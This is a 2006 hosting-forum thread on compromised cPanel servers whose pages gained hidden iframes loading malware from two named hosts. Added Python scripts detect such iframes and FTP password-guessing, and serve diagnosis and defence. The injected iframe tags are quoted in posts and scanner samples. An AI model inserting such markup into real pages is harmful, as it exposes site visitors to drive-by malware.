#1
11-30-2006, 09:08 AM
cPanel Partner NOC
 
Join Date: Dec 2004
Posts: 376
forlinuxsupport is on a distinguished road
stelaartois.ru - cpanel server hacked?

Hi

I have found this on one of my cPanel servers and googling it has come up with 2 other servers it has happened on. One of the common things is they are all cPanel servers.

I have inserted spaces in the words, in case someone clicks on it:

< I F R A M E name='StatPage' src='h t t p : / / s t e l a a r t o i s . r u /index2.php' w i d t h=5 h e i g h t=5
s t y l e='display:none'></IFRAME>

It seems to really slow the server down... some type of DoS attack when running it?

Anyone else had this issue? I'm busy investigating it, so I will post back here if I find anything.

Just found out, one server changed the root password and that stopped them getting on. I looked in logs and can't find anyone SSHing on... hmm... puzzling.

Regards
Andy
__________________
www.Forlinux.co.uk
Linux Hosting & Support solutions
Please note the information given is intended as advice only.
#2
11-30-2006, 09:43 AM
Registered User
 
Join Date: Nov 2006
Location: Lithuania
Posts: 122
Kelmas is on a distinguished road
That is an exploit that hit many HostGator servers some time ago, and that iframe contained a serious virus. I suggest backing up the /home/ dirs and reinstalling the servers.

The problem is in PHP rendering (it automatically adds the iframe to all generated pages) and it spreads due to an IE exploit. Other browsers do not show this.
__________________
Gytis Repecka aka Kelmas
NFS Tuning / AutoNews.lt webmaster, IT journalist
#3
11-30-2006, 09:44 AM
cPanel Partner NOC
 
Join Date: Dec 2004
Posts: 376
forlinuxsupport is on a distinguished road

Hey guys

I know the exploit you are talking about and I ran the cpanel script and did the force update when that happened (about a month or so ago).

So I'm puzzled as to how they are able to do it now...

I'm hoping it's not a new cPanel exploit. Apache logs have rotated (nice one cPanel) so I can't even look back in those.

Regards
Andy
__________________
www.Forlinux.co.uk
Linux Hosting & Support solutions
Please note the information given is intended as advice only.
#4
11-30-2006, 09:47 AM
cPanel Partner NOC
 
Join Date: May 2004
Location: Minneapolis, MN
Posts: 2,212
AndyReed is on a distinguished road
Quote:
Originally Posted by forlinuxsupport View Post
I have found this on one of my cpanel servers and googling it has come up with 2 other servers it has happened on. One of the common things is they are all CPANEL servers.

I have inserted spaces in the words , in case someone clicks on it

< I F R A M E name='StatPage' src='h t t p : / / s t e l a a r t o i s . r u /index2.php' w i d t h=5 h e i g h t=5
s t y l e='display:none'></IFRAME>

It seems to really slow the server down... some type of DoS attack when running it?

Anyone else had this issue? I'm busy investigating it, so I will post back here if I find anything.

Just found out, one server changed the root password and that stopped them getting on. I looked in logs and can't find anyone SSHing on... hmm... puzzling.
Just in case, these are a few of the symptoms of a server that has been compromised:
  1. Applications that suddenly don't respond as expected.
  2. Additional user accounts that you can't account for (these may be made to look like system accounts)
  3. New files or directories with unusual names.
  4. Additional network traffic that can't be traced to a particular process
  5. E-Mail from a security department implying that your server has been port scanning or sending malicious network traffic
  6. Server running significantly slower

If you are experiencing any of these symptoms, your server has been compromised and the best solution is an OS reload.
__________________
Andy Reed
ServerTune.com
Dedicated server hosting, Colocation Services, Server Management, and cPanel Licenses
#5
12-01-2006, 04:34 PM
cPanel Partner NOC
 
Join Date: May 2004
Location: Minneapolis, MN
Posts: 2,212
AndyReed is on a distinguished road
Quote:
Originally Posted by forlinuxsupport View Post
I'm hoping its not a new cpanel exploit.
Is it a cPanel exploit???
__________________
Andy Reed
ServerTune.com
Dedicated server hosting, Colocation Services, Server Management, and cPanel Licenses
#6
12-02-2006, 12:03 PM
Registered User
 
Join Date: Sep 2003
Location: UK, Luton
Posts: 197
JamesSmith
Some of our servers are suffering the same fate, despite everything being up to date. Some web sites on some servers have the following added to their index.php pages:

Code:
<iframe src="http://isecurepages.net/out.php?s_id=11" width=0 height=0></iframe>
I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!
__________________
Regards,
James Smith
UH Hosting Ltd
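Posts #1 and #6 quote two forms of the same injection: an iframe pointing at an external host, hidden either with display:none or with zero/near-zero width and height. The script below is an added example (it is not code from this thread, from cPanel or from any of the posters) that walks a web root and reports iframes matching those traits. The two hosts are the ones quoted above (post #1 shows its sample with spaces inserted; the scanner matches the un-spaced form that would actually sit in a served page); the sample files it scans are constructed inline so it runs offline, and the 5-pixel "tiny" threshold is an assumption chosen to cover both quoted samples.

```python
"""Scan a web root for hidden/injected iframes of the kind reported in this thread.

Added example, not code from the thread. The sample files and directory layout are
constructed here so the script runs offline; point scan_tree() at a real docroot to use it.
"""
import re
import tempfile
from pathlib import Path

# Indicators quoted in posts #1 and #6 of the thread.
KNOWN_BAD_HOSTS = ("stelaartois.ru", "isecurepages.net")

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*['"]?([^'"\s>]+)""", re.IGNORECASE)
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none", re.IGNORECASE)
DIM_RE = re.compile(r"""\b(width|height)\s*=\s*['"]?(\d+)""", re.IGNORECASE)

# Assumption: an iframe whose every declared dimension is at most this many pixels is hidden.
TINY_PX = 5


def classify_iframe(tag):
    """Return the reasons an <iframe ...> opening tag looks injected; [] means nothing suspicious."""
    reasons = []
    m = SRC_RE.search(tag)
    src = m.group(1).lower() if m else ""
    if any(host in src for host in KNOWN_BAD_HOSTS):
        reasons.append("known-bad host")
    if HIDDEN_STYLE_RE.search(tag):
        reasons.append("display:none")
    dims = {name.lower(): int(px) for name, px in DIM_RE.findall(tag)}
    if dims and all(px <= TINY_PX for px in dims.values()):
        reasons.append("tiny dimensions")
    return reasons


def scan_html(text):
    """All suspicious iframe tags in one document, as (tag, reasons) pairs."""
    findings = []
    for tag in IFRAME_RE.findall(text):
        reasons = classify_iframe(tag)
        if reasons:
            findings.append((tag, reasons))
    return findings


def scan_tree(root, suffixes=(".php", ".html", ".htm")):
    """Walk a web root and return {Path: findings} for files containing suspicious iframes."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            findings = scan_html(path.read_text(errors="replace"))
            if findings:
                results[path] = findings
    return results


# Constructed sample pages: two carrying the injected tags quoted in the thread, one benign embed.
SAMPLE_FILES = {
    "index.php": '<?php echo "hello"; ?>\n'
                 '<iframe src="http://isecurepages.net/out.php?s_id=11" width=0 height=0></iframe>\n',
    "page.html": "<html><body>content\n"
                 "<IFRAME name='StatPage' src='http://stelaartois.ru/index2.php' width=5 height=5 "
                 "style='display:none'></IFRAME></body></html>\n",
    "ok.html": '<iframe src="https://example.com/embed" width=560 height=315></iframe>\n',
}


def demo():
    """Write the sample files to a temp dir, scan it, and return {filename: findings}."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE_FILES.items():
            Path(tmp, name).write_text(body)
        return {path.name: findings for path, findings in scan_tree(tmp).items()}


if __name__ == "__main__":
    for name, findings in sorted(demo().items()):
        for tag, reasons in findings:
            print(f"{name}: {', '.join(reasons)}\n    {tag}")
```

The host list only catches what is already known; the display:none and tiny-dimension checks are what catch the next domain the same injector points at, so review those hits by hand rather than filtering on the host list alone. A hit in a file whose mtime predates the incident, or in every page the server renders regardless of file content, points at the PHP engine rather than the files, which is the distinction posts #2 and #13 draw.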
#7
12-02-2006, 12:37 PM
cPanel Partner NOC
 
Join Date: May 2004
Location: Minneapolis, MN
Posts: 2,212
AndyReed is on a distinguished road
Quote:
Originally Posted by JamesSmith View Post
I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!
Unless you can prove that your server was hacked because of their control panel, you don't have a case against them. It is in your best interest to take all measures to harden and secure your server. Remember that cPanel offers web hosting software that automates the intricate workings of web hosting servers. Compared to other control panels, cPanel is the most secure and robust control panel.
__________________
Andy Reed
ServerTune.com
Dedicated server hosting, Colocation Services, Server Management, and cPanel Licenses
#8
12-02-2006, 02:37 PM
Registered User
 
Join Date: Nov 2006
Location: Lithuania
Posts: 122
Kelmas is on a distinguished road
Quote:
Originally Posted by JamesSmith View Post
I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!
You can try searching for information on the HostGator forums; the guys had a hard time, but solved a similar attack.
__________________
Gytis Repecka aka Kelmas
NFS Tuning / AutoNews.lt webmaster, IT journalist
#9
12-02-2006, 07:59 PM
Registered User
 
Join Date: Sep 2003
Location: UK, Luton
Posts: 197
JamesSmith
Quote:
Originally Posted by AndyReed View Post
Unless you can prove that your server was hacked because of their control panel, you don't have a case against them. It is in your best interest to take all measures to harden and secure your server. Remember that cPanel offers web hosting software that automates the intricate workings of web hosting servers. Compared to other control panels, cPanel is the most secure and robust control panel.
I have no doubt that it was because of the recent cPanel exploit, as it has occurred and is occurring on a number of other hosts.

It will be interesting to see how this progresses and if the impact of it is felt further; maybe when more people are affected someone will take notice.
__________________
Regards,
James Smith
UH Hosting Ltd
#10
12-03-2006, 04:35 AM
Registered User
 
Join Date: Nov 2004
Posts: 10
dfltech is on a distinguished road
I was googling and found some links that had this problem as well..

Now what concerned me was they all used cPanel servers and they were all affected in late November. So it is definitely not the last exploit.

I hope that it is not the cPanel again..!!!
#11
12-03-2006, 04:52 AM
Registered User
 
Join Date: Nov 2006
Location: Lithuania
Posts: 122
Kelmas is on a distinguished road
Quote:
Originally Posted by dfltech View Post
Now what concerned me was they all used cPanel servers and they were all affected in late November. So it is definitely not the last exploit.
Actually late September.
__________________
Gytis Repecka aka Kelmas
NFS Tuning / AutoNews.lt webmaster, IT journalist
#12
12-03-2006, 05:02 AM
Registered User
 
Join Date: Sep 2003
Location: UK, Luton
Posts: 197
JamesSmith
The isecurepage code started to appear for us about a week before the cPanel exploit was announced by cPanel.

I think we need some clarification from HostGator on whether their problem was the same and what line of code was added to people's sites. If we can see a pattern, then there's still a problem that cPanel needs to do something about.

The problem is, we don't know how this line of code is being added to sites.
__________________
Regards,
James Smith
UH Hosting Ltd
#13
12-03-2006, 05:18 AM
Registered User
 
Join Date: Nov 2006
Location: Lithuania
Posts: 122
Kelmas is on a distinguished road
Quote:
Originally Posted by JamesSmith View Post
The problem is, we don't know how this line of code is being added to sites.
As in HostGator's issue, these lines were added by an infected PHP engine during page rendering.
__________________
Gytis Repecka aka Kelmas
NFS Tuning / AutoNews.lt webmaster, IT journalist
#14
12-04-2006, 06:55 AM
cPanel Partner NOC
 
Join Date: Dec 2004
Posts: 376
forlinuxsupport is on a distinguished road

Yes... got it.

They had guessed 3 users' FTP usernames and passwords on the server.

Not sure how they would get those usernames.

The IP he came from was 209.160.65.6

The usernames were (so not easy to guess):
lookwhat
paulslee
yeschef

I'm wondering if there is more to this... and how they got those details...

Might have exploited the server earlier and downloaded all usernames and passwords.

Cheers
Andy
__________________
www.Forlinux.co.uk
Linux Hosting & Support solutions
Please note the information given is intended as advice only.
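Post #1 looked for SSH logins and found none; post #14 found the entry point in the FTP logs instead, with several accounts used from one address. The script below is an added example (not code from the thread or from any poster) of the check that surfaces that pattern: group FTP login records by source address, and flag sources that tried several distinct accounts or that succeeded only after repeated failures. The log line format, addresses (RFC 5737 documentation ranges) and usernames are all constructed for the example; real daemons such as pure-ftpd or proftpd log in their own formats, so LINE_RE is the part to adapt.

```python
"""Flag FTP sources that look like credential guessing.

Added example, not code from the thread. LINE_RE matches a constructed log format;
adapt it to the format your FTP daemon actually writes.
"""
import re
from collections import defaultdict

# Constructed format: "<date> <time> ftpd: OK|FAIL LOGIN user=<name> ip=<addr>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) ftpd: (?P<result>OK|FAIL) LOGIN user=(?P<user>\S+) ip=(?P<ip>\S+)$"
)

# Constructed sample log (documentation addresses, invented usernames). One source walks
# through three accounts and gets in on the fourth try; another is a user mistyping once.
SAMPLE_LOG = """\
2006-12-03 22:40:00 ftpd: daemon started
2006-12-03 22:41:10 ftpd: FAIL LOGIN user=alice ip=198.51.100.7
2006-12-03 22:41:13 ftpd: FAIL LOGIN user=alice ip=198.51.100.7
2006-12-03 22:41:15 ftpd: FAIL LOGIN user=bob ip=198.51.100.7
2006-12-03 22:41:18 ftpd: FAIL LOGIN user=carol ip=198.51.100.7
2006-12-03 22:41:21 ftpd: OK LOGIN user=carol ip=198.51.100.7
2006-12-03 22:52:02 ftpd: OK LOGIN user=carol ip=198.51.100.7
2006-12-04 08:10:44 ftpd: OK LOGIN user=dave ip=203.0.113.9
2006-12-04 08:15:01 ftpd: FAIL LOGIN user=dave ip=203.0.113.9
2006-12-04 08:15:20 ftpd: OK LOGIN user=dave ip=203.0.113.9
"""


def parse(lines):
    """Yield dicts with ts/result/user/ip for lines matching LINE_RE; other lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def suspicious_sources(records, min_accounts=3, min_fails=2):
    """Group logins by source IP, in log order, and flag sources that tried at least
    min_accounts distinct accounts or logged in only after min_fails failures. The
    accounts behind such late successes are the ones whose passwords need resetting."""
    by_ip = defaultdict(lambda: {"users": set(), "fails": 0, "guessed": set()})
    for r in records:
        e = by_ip[r["ip"]]
        e["users"].add(r["user"])
        if r["result"] == "FAIL":
            e["fails"] += 1
        elif e["fails"] >= min_fails:
            # success from a source that had already failed repeatedly: treat as guessed
            e["guessed"].add(r["user"])
    flagged = {}
    for ip, e in by_ip.items():
        reasons = []
        if len(e["users"]) >= min_accounts:
            reasons.append(f"{len(e['users'])} distinct accounts tried")
        if e["guessed"]:
            reasons.append("login succeeded after repeated failures")
        if reasons:
            flagged[ip] = {"reasons": reasons, "accounts": sorted(e["guessed"])}
    return flagged


def analyze(log_text, min_accounts=3, min_fails=2):
    """Run the check over a whole log file's text and return {ip: {reasons, accounts}}."""
    return suspicious_sources(parse(log_text.splitlines()), min_accounts, min_fails)


if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, "-", "; ".join(info["reasons"]))
        if info["accounts"]:
            print("  reset passwords for:", ", ".join(info["accounts"]))
```

The thresholds are deliberately separate: a single failed attempt before a success is what a mistyped password looks like, so min_fails keeps that out, while min_accounts catches a source that cycles through usernames it should not know. Once the logs have rotated, as the Apache logs had in post #3, this check is no longer possible, which is the argument for shipping FTP and SSH authentication logs off the box before an incident rather than after.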
#15
12-04-2006, 09:30 AM
Registered User
 
Join Date: Nov 2004
Posts: 10
dfltech is on a distinguished road
Quote:
Originally Posted by Kelmas View Post
Actually late September.
No, it's late November... and by the way I have a friend whose site had the same iframe hack yesterday. Now he has a VPS with very few sites and cPanel, but all the other sites were intact. So this should not have anything to do with cPanel, I suppose.

Maybe a PHP application or a function...

And regarding HostGator, their issue was at the same time as the cPanel exploit. I have gone through their forums but did not find any recent complaints about the iframe hack.

Last edited by dfltech; 12-05-2006 at 08:02 AM.
Powered by vBulletin® Version 3.8.2
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
© cPanel Inc